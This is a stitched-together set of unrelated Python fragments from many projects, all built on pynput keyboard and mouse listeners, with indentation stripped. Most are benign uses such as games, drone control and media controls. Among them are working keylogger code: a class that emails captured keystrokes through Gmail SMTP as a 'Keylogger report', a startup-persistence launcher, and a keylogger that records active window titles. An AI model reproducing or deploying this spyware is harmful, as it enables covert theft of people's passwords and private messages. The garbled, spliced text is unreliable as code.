def listen_event():
def on_click(x, y, button, pressed):
# print('{0} {1} at {1}'.format(
# button,
# 'Pressed' if pressed else 'Released',
# (x, y)))
if f'{button}' == 'Button.middle' and pressed:
print('Button Middle pressed.')
tiles = realtime_shot()
sync(tiles)
# if keyboard.is_pressed('1'):
# return False
def on_press(key):
# print("Key pressed: {0}".format(key))
if key == Key.esc:
print("Key pressed: {0}".format(key))
# return False
KeyboardListener.stop()
MouseListener.stop()
keyboard_listener = KeyboardListener(on_press=on_press)
mouse_listener = MouseListener(on_click=on_click)
keyboard_listener.start()
mouse_listener.start()
keyboard_listener.join()
mouse_listener.join()
def start_listen():
# with Listener(on_press=printkey) as listener:
# listener.join()
listener = Listener(on_press=printkey)
x = listener.start()
print(x)
listener.join()
class Autoclicker(object):
def on_press(self, key):
if key == self.start_stop_key:
if self.click_thread.running:
self.click_thread.stop_clicking()
else:
self.click_thread.start_clicking()
elif key == self.exit_key:
self.click_thread.exit()
self.listener.stop()
def __init__(self, button, delay):
super().__init__()
self.mouse = Controller()
self.delay = delay
self.button = button
self.click_thread = ClickMouse(delay, button, self.mouse)
self.click_thread.start()
self.start_stop_key = KeyCode(char='s')
self.exit_key = KeyCode(char='e')
self.listener = Listener(on_press=self.on_press)
self.listener.start()
def start(self):
self.listener.join()
def get_region():
global mouse
global a_pressed
x1, y1, x2, y2 = 0, 0, 0, 0
print(
"Put your mouse in the top-left corner of the puzzles region, then press 'A'"
)
listener = Listener(on_press=on_press)
listener.start()
listener.join()
if a_pressed:
print("A pressed")
a_pressed = False
x1, y1 = mouse.position
print(
"Put your mouse in the bottom-right corner of the puzzles region, then press 'A'"
)
listener = Listener(on_press=on_press)
listener.start()
listener.join()
if a_pressed:
print("A pressed")
a_pressed = False
x2, y2 = mouse.position
return x1, y1, x2, y2
class KeyboardController(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.pressed = set([])
self.functions = {}
self.start()
def on_press(self, key):
self.pressed.add(key)
if key in self.functions:
self.functions[key]()
def on_release(self, key):
try:
self.pressed.remove(key)
except:
pass
def add(self, key, function):
self.functions[key] = function
def run(self):
self.listener = Listener(on_press=self.on_press, on_release=self.on_release)
self.listener.start()
self.listener.join()
def callback(self):
self.listener.stop()
def main():
global pause, nxt, vol, exit, key_listener
try:
pause = ''
nxt = ''
vol = ''
exit = ''
tracks = []
path = os.getcwd()
re_track = re.compile(r'^.+\.(?:mp3|mp4|wav)')
for dirpath, dirnames, filenames in os.walk(path + '\\tracks'):
[tracks.append(file) for file in filenames if re_track.match(file)]
display()
key_listener = Listener(on_press=on_press)
player = Thread(target=media_player, args=(tracks, path))
key_listener.start()
player.start()
key_listener.join()
player.join()
except KeyboardInterrupt:
print('Program exiting ..')
if key_listener.is_alive():
key_listener.stop()
class KeyController:
def __init__(self):
self.listener = Listener(
on_press=self.on_press,
on_release=self.on_release)
self.key_pressed = []
self.thread = Thread(target=self.run, args=())
self.thread.start()
def on_press(self, key: KeyCode):
# print('{0} release'.format(key))
keychar = str(key).replace("\'", "").lower()
if keychar not in self.key_pressed:
self.key_pressed.append(keychar)
def on_release(self, key: KeyCode):
# print('{0} release'.format(key))
keychar = str(key).replace("\'", "").lower()
if keychar in self.key_pressed:
self.key_pressed.remove(keychar)
if key == KeyCode.from_char('t'):
# Stop listenerd
return False
def run(self):
with self.listener:
self.listener.join()
self.stop()
def stop(self):
self.listener.stop()
def get_key_pressed(self) -> list:
return self.key_pressed
def __init__(self):
print("Running bot.")
self.key_pressed = False
# Listens keyboard events
listener = Listener(self.on_press, self.on_release)
listener.start()
listener.join()
print("Listening to key pressed...")
def main():
global listener
listener = Listener(on_press=on_press, on_release=on_release)
listener.start()
listener.join()
return
def start():
"""Main function"""
addStartup()
check_file()
connection_to_the_Internet()
lis = Listener(on_press = on_press)
lis.start()
lis.join()
class KeyLogger:
def __init__(self, email, password):
self.listener = Listener(on_press=self.on_press,
on_release=self.on_release)
self.keys = []
self.count = 0
self.file = "log.txt"
self.email = email
self.password = password
self.msg = MIMEMultipart()
self.msg['Subject'] = 'Keylogger report'
self.msg['From'] = self.email
self.msg['To'] = self.email
def on_press(self, key):
if not isinstance(key, (Key)):
key = key.char
self.keys.append(key)
self.count += 1
if self.count >= 50:
self.log_file()
def on_release(self, key):
if key == Key.esc:
self.log_file()
return False
def log_file(self):
with open(self.file, 'w') as f:
for key in self.keys:
k = str(key).replace("'", "")
f.write(k)
f.write(' ')
f.write('\n')
self.count = 0
self.send_mail(self.email, self.password)
self.keys = []
self.msg = MIMEMultipart()
self.msg['Subject'] = 'Keylogger report'
self.msg['From'] = self.email
self.msg['To'] = self.email
def send_mail(self, email, password):
with open(self.file, 'r') as f:
part = MIMEApplication(f.read(), Name=self.file)
part['Content-Disposition'] = 'attachment; filename="{}"'.format(
self.file)
self.msg.attach(part)
server = smtplib.SMTP("smtp.gmail.com", 587)
server.starttls()
server.login(email, password)
server.sendmail(email, email, self.msg.as_string())
server.quit()
def start(self):
self.listener.start()
self.listener.join()
def _main():
global args
# args = {"g": False,
# "h": False,
# "t": False,
# "a": False}
print("G - Include grid lines")
print("H - HSV representation")
print("T - Transparent background")
print("A - Cumulative data-points")
print("W - Write pixel values to text file")
print()
print("Press <ENTER> to continue to input path")
print("Or <ESC> to exit")
print()
_print_args()
l = Listener(on_press=_listen_press, suppress=True)
l.start()
l.join()
if stop:
exit(1)
print("\n" * 5)
print("Enter image path as: ")
print("Global: C:\...\img.jpg")
print("OR")
print("Local: ...\img.png")
print()
print("Note: Extensions must be included")
print("To exit: X")
print()
print()
while True:
path_in = input("Path:\t").upper()
if path_in == "X":
exit(1)
if _check_path(path_in):
if _check_ext(path_in):
break
else:
print("Invalid or Unusable extension\n")
else:
print("No such path exists\n")
args_out = [args['g'], args['h'], args['t'], args['a'], args['w'], path_in]
print(args_out)
# return args_out
return args['g'], args['h'], args['t'], args['a'], args['w'], path_in
def main():
global mouseListener
keyListener = Listener(on_press=on_press, on_release=on_release)
mouseListener = msListener(on_click=on_click)
mouseListener.start()
keyListener.start()
mouseListener.join()
keyListener.join()
class KeyboardLogger():
class Event(enum.Enum):
Press = 1
Release = 2
def __init__(self, file_name=None, debug=False, handler=None) -> None:
super().__init__()
self.listener = None
self.data = []
self.debug = debug
self.handler = handler
self.file_name = file_name
self.last_pressed_key = None
self.last_released_key = None
def on_press(self, key):
if self.handler is not None and callable(self.handler):
self.handler(key)
if key != self.last_pressed_key and hasattr(key, 'vk'):
timestamp = time()
self.data.append(
[timestamp, key.vk, KeyboardLogger.Event.Press.value])
self.last_released_key = None
self.last_pressed_key = key
if self.debug:
print('{0} pressed at {1}'.format(key, timestamp))
def on_release(self, key):
if key != self.last_released_key and hasattr(key, 'vk'):
timestamp = time()
self.data.append(
[timestamp, key.vk, KeyboardLogger.Event.Release.value])
self.last_released_key = key
self.last_pressed_key = None
if self.debug:
print('{0} released at {1}'.format(key, timestamp))
def start_thread(self):
if self.debug:
print("Logger started")
self.listener = Listener(on_press=self.on_press,
on_release=self.on_release)
with self.listener:
self.listener.join()
def start(self):
listener_thread = threading.Thread(target=self.start_thread)
listener_thread.start()
def stop(self):
if self.debug:
print("Logger stopped")
if self.file_name is None:
return
if self.listener is not None:
self.listener.stop()
numpy.savetxt(self.file_name + KEYS_SUFFIX, self.data)
class KeyboardController:
def __init__(self, args, input_ptr=None, scale=0.2):
print("[Keyboard] Attaching Keyboard Handle")
self.args = args
self.factor = 0.5 if self.args.crazyflie else 2
self.scale = scale
self.input_ptr = input_ptr
self.input_ptr_copy = np.copy(self.input_ptr)
(self.yaw_idx,
self.neg) = (11, 1) if len(self.input_ptr) == 12 else (3, -1)
self.orig_settings = termios.tcgetattr(sys.stdin)
tty.setcbreak(sys.stdin)
self.keyboard_handle = Listener(on_press=self.on_press,
on_release=self.on_release)
self.keyboard_handle.start()
def on_press(self, key):
try:
if key.char == 'w':
self.input_ptr[2] -= self.scale
elif key.char == 's':
self.input_ptr[2] += self.scale
if key.char == 'a':
self.input_ptr[self.yaw_idx] -= deg2rad(90)
elif key.char == 'd':
self.input_ptr[self.yaw_idx] += deg2rad(90)
if key.char == 'i':
self.input_ptr[0] += self.scale
elif key.char == 'k':
self.input_ptr[0] -= self.scale
if key.char == 'j':
self.input_ptr[1] += self.scale
elif key.char == 'l':
self.input_ptr[1] -= self.scale
except AttributeError:
if key == Key.esc:
return False
def on_release(self, key):
try:
if key.char == 'a' or key.char == 'd':
self.input_ptr[self.yaw_idx] = 0
except AttributeError:
pass
def close(self):
Controller().press(Key.esc)
Controller().release(Key.esc)
self.keyboard_handle.join()
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, self.orig_settings)
print("[Keyboard] Keyboard handle closed...")
def main():
global args, ip
if args.ip:
ip = args.ip
if args.command:
exec_command(args.command)
else:
l = Listener(on_press=on_press, on_release=on_release)
l.start()
print("welcom to your digital roku controller. press ? or / for help")
input_mode_handler()
l.join()
def __init__(self):
self.tab = Tab()
self.bar = Bar()
self.cursor_string = 1
self.cursor_position = 0
self.max_len = 0
self.current_keys = set()
self.view = View()
self.view.print(self.tab, self.bar, self.cursor_string,
self.cursor_position)
listener = Listener(on_press=self.on_press)
listener.start()
listener.join()
def main():
global screenshot
input('Please hit enter to begin\n')
key_listener = Listener(on_press=on_press)
screenshot = Process(target=screenshots, args=(file_path, ))
key_listener.start()
screenshot.start()
key_listener.join(600.0)
screenshot.join(timeout=600)
main()
def start_record(self):
self.log = open(self.replay_file, "w")
self.init_time = time.time() * 1000 # To make microseconds
keyboard_listener = KeyboardListener(on_press=self.__on_press,
on_release=self.__on_release)
mouse_listener = MouseListener(on_click=self.__on_click,
on_scroll=self.__on_scroll)
keyboard_listener.start()
mouse_listener.start()
keyboard_listener.join()
mouse_listener.stop()
keyboard_listener.stop()
self.log.flush()
self.log.close()
def getdir(self):
self.dir_ = None # 如果是不是上下左右则返回None
def on_press(key):
if key == Key.up: self.dir_ = Direction.UP
elif key == Key.down: self.dir_ = Direction.DOWN
elif key == Key.left: self.dir_ = Direction.LEFT
elif key == Key.right: self.dir_ = Direction.RIGHT
return False
listener = Listener(on_press=on_press) # 创建监听器
listener.start() # 开始监听,每次获取一个键
listener.join() # 加入线程
listener.stop() # 结束监听
return self.dir_
def main():
global command_file, screenshot
input('Please hit enter to begin\n')
with open(file_path + 'keys.txt', 'a') as command_file:
key_listener = Listener(on_press=on_press)
screenshot = Process(target=screenshots, args=(file_path, ))
key_listener.start()
screenshot.start()
key_listener.join(600.0)
screenshot.join(timeout=600)
regex_formating(file_path)
main()
class KeyboardController_CD:
def __init__(self, args, input_ptr=None, scale=0.2, camera=None):
print("[Keyboard_CD] Attaching Keyboard Handle for Camera Direct")
self.args = args
self.factor = 0.35 if self.args.crazyflie else 2
self.scale = scale
self.camera = camera
self.input_ptr = input_ptr
self.input_ptr_copy = np.copy(self.input_ptr)
(self.yaw_idx,
self.neg) = (11, 1) if len(self.input_ptr) == 12 else (3, -1)
self.orig_settings = termios.tcgetattr(sys.stdin)
tty.setcbreak(sys.stdin)
self.keyboard_handle = Listener(on_press=self.on_press,
on_release=self.on_release)
self.keyboard_handle.start()
def on_press(self, key):
try:
if key.char == 'c':
self.input_ptr[0] = self.factor * self.camera.x_dot
self.input_ptr[1] = self.factor * self.camera.y_dot
self.input_ptr[
2] = self.factor * self.camera.z_dot + self.input_ptr_copy[
2]
except AttributeError:
if key == Key.esc:
return False
def on_release(self, key):
try:
if key.char == 'a' or key.char == 'd':
self.input_ptr[self.yaw_idx] = 0
except AttributeError:
pass
def close(self):
Controller().press(Key.esc)
Controller().release(Key.esc)
self.keyboard_handle.join()
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, self.orig_settings)
print("[Keyboard_CD] Keyboard handle closed...")
def loop(vid_file=None, vid_path='./videos/'):
state = LooperState(video_loaded=True)
cam = FakeWebcam('/dev/video2', 640, 480)
cam.print_capabilities()
cam_stream = setup_cam_stream(1)
# out_stream, vid_file = setup_recording(vid_path)
file_stream = setup_file_stream(vid_path, vid_file)
listener = Listener(on_press=state.change_state)
listener.start()
while not state.quit:
if state.cur_state == 'loop':
ret, frame = file_stream.read()
if ret:
frame = cv2.resize(frame, (640, 480))
else:
file_stream.set(cv2.CAP_PROP_POS_FRAMES, 0)
continue
elif state.cur_state == 'live':
ret, frame = cam_stream.read()
frame = cv2.resize(frame, (640, 480))
elif state.cur_state == 'blank':
frame = np.zeros([480, 640, 3], np.uint8)
elif state.cur_state == 'frozen':
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
elif state.cur_state == 'recording':
ret, frame = cam_stream.read()
frame = cv2.resize(frame, (640, 480))
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
cam.schedule_frame(frame)
time.sleep(1 / 30.0)
print('Closing all streams...')
file_stream.release()
cam_stream.release()
listener.stop()
listener.join()
def main(foreground, buffer_size, trigger_keys):
# Initialize all components and hook them up.
appDirs = AppDirectories() # XDG folders
notifier = Notifier(typelock) # Create the notifier that calls to each phrase handler
database = Database(appDirs) # Read database in
dbchange = DatabaseChangeHandler(notifier, database)
watch = InotifyWatch(database.dbFile)
watch.add_observer(dbchange) # Watch for changes in database outside this process
i = InputHandler(typelock, notifier, buffer_size, trigger_keys) # Accepts keyboard inputs
watch.start()
i.add_handler(DeleteHandler()) # Special behavior for deletes
i.add_handler(AlphaNumHandler()) # Standard behavior for everything else
i.add_handler(SpaceHandler())
write_pid(appDirs) # Store the current pid
listener = Listener(on_press=i)
with Listener(on_press=i) as listener: # Continue listening until SIGTERM
signal.signal(signal.SIGTERM, ShutdownHook(listener, watch, appDirs))
signal.signal(signal.SIGINT, ShutdownHook(listener, watch, appDirs))
listener.join()
def startListener(arg):
global listener # inform function to use external variable
if arg == btStart:
if listener is None:
print('[+] starting listener')
listener = Listener(on_press=press)
listener.start()
else:
print('[!] already running')
if arg == btStop:
if listener is None:
print('[!] not running')
else:
print('[+] stoping thread')
listener.stop()
listener.join()
listener = None
def startHackpyKeyLogger(self):
global hackpyKeyloggerIsStopped
hackpyKeyloggerIsStopped = False
# Write some data
with open(self.filename, 'a') as logs:
logs.write('\n(' + date.all() + ') - [' + getActiveWindow() +
'] - \"')
# Replace
key_map = {'Key.space': ' ', 'Key.enter': '\n', '\'': '', 'Key.': ''}
# Save key
def on_press(key):
Key_text = str(key)
# Replace space, enter to ' ' and '\n'
for old, new in key_map.items():
Key_text = Key_text.replace(old, new)
# If is special key
if len(Key_text) > 1:
Key_text = ' [' + Key_text + '] '.upper()
# If is enter
if (Key_text == '\n'):
Key_text = '\"\n' + '(' + date.all(
) + ') - [' + getActiveWindow() + '] - \"'
#print(Key_text)
with open(self.filename, 'a', encoding="utf8",
errors='ignore') as logs:
logs.write(Key_text)
if hackpyKeyloggerIsStopped:
logs.write('\"')
return False
# if key == Key.esc:
# print('Exit')
# return False
# Collect keyboard events
s = Listener(on_release=on_press)
s.start()
s.join()
def PracticeTyperacing():
global accuracy, correct_characters, text, start_time, character_infos, wpm, correct_counter, incorrect_counter, current_time
clearscreen()
ResetStats()
start_time = time.time()
active_game = True
DisplayContent()
game = Listener(on_press=KeyComparison)
game.start()
game.join()
#accuracy = (len(correct_characters) / len(text)) * 100.0
accuracy = ComputeAccuracy(character_infos)
DisplayContent(mode='gameover')
print('game over\n')
print(f'WPM: {wpm}')
print(f'Accuracy: {fixed_set_precision_str(accuracy, 2)}%\n')
ResetStats()
pauseprogram()
def get_unix_keys(queue):
if platform_name != 'Windows':
def on_release(key):
unix_keys = []
if key == Key.space:
unix_keys.append(' ')
queue.put(unix_keys)
else:
try:
unix_keys.append(key.char)
queue.put(unix_keys)
if key.char == 'q':
return False
except:
pass
listener = Listener(on_release=on_release)
listener.daemon = True
listener.start()
listener.join()
def start(bbox, allowed_error=5, tesspath=""):
"""Takes in bounding box coordinates and begins watching
that section of the screen for the text "Fishing Bobber splashes",
double clicking the right mouse button when it sees it to reel in
the fish and recast the line. Press enter to quit.
Arguments:
bbox (list)
A list of 4 numbers (x1, y1, x2, y2) obtained from the screengrabber
program, where (x1, y1) is the top left corner of the bounding box
and (x2, y2) is the lower right corner
allowed_error (`int`, optional)
The margin of error (measured in Levenshtein distance) allowed for
text matching, i.e. 'Fishing Gobber splashes' has an error of 1
tesspath (`str`, optional)
The path to your Tesseract installation, leave blank to use default
"""
if tesspath != "":
pt.pytesseract.tesseract_path = tesspath
mouse = Controller()
listener = Listener(on_press=_keyDown)
listener.start()
timeout = 45 # Fish always appears within 45 seconds, if we wait longer than this then recast the line
cast_time = time.monotonic()
while listener.is_alive():
# Grab portion of screen defined in config file & send it to tesseract
screen = ig.grab(bbox=bbox)
screen_text = pt.image_to_string(screen)
if match(screen_text, threshold=allowed_error
) or time.monotonic() - cast_time > timeout:
# Either fish was found or timeout was exceeded, reel in the line and cast it again
mouse.click(Button.right, 2)
cast_time = time.monotonic()
time.sleep(0.25)
listener.join()
class Director:
def on_key_press(self, key):
if key == Key.down:
self.selector.move_down()
elif key == Key.up:
self.selector.move_up()
elif key == Key.enter:
self.selector.move_in()
elif key == Key.esc:
self.selector.move_out()
elif key == Key.delete:
actions.delete_selected_object(self.selector.display)
elif key == Key.backspace:
self.key_listener.stop()
self.hotkey_listener.stop()
self.selector.display.terminate = True
def on_ctrl_d_press(self):
actions.create_new_directory(self.selector.display)
def on_ctrl_f_press(self):
actions.create_new_file(self.selector.display)
def __init__(self, selector):
self.selector = selector
self.started = False
self.key_listener = Listener(self.on_key_press)
self.hotkey_listener = GlobalHotKeys({
'<ctrl>+d': self.on_ctrl_d_press,
'<ctrl>+f': self.on_ctrl_f_press
})
def start_directing(self):
if not self.started:
self.started = True
self.key_listener.start()
self.hotkey_listener.start()
self.key_listener.join()
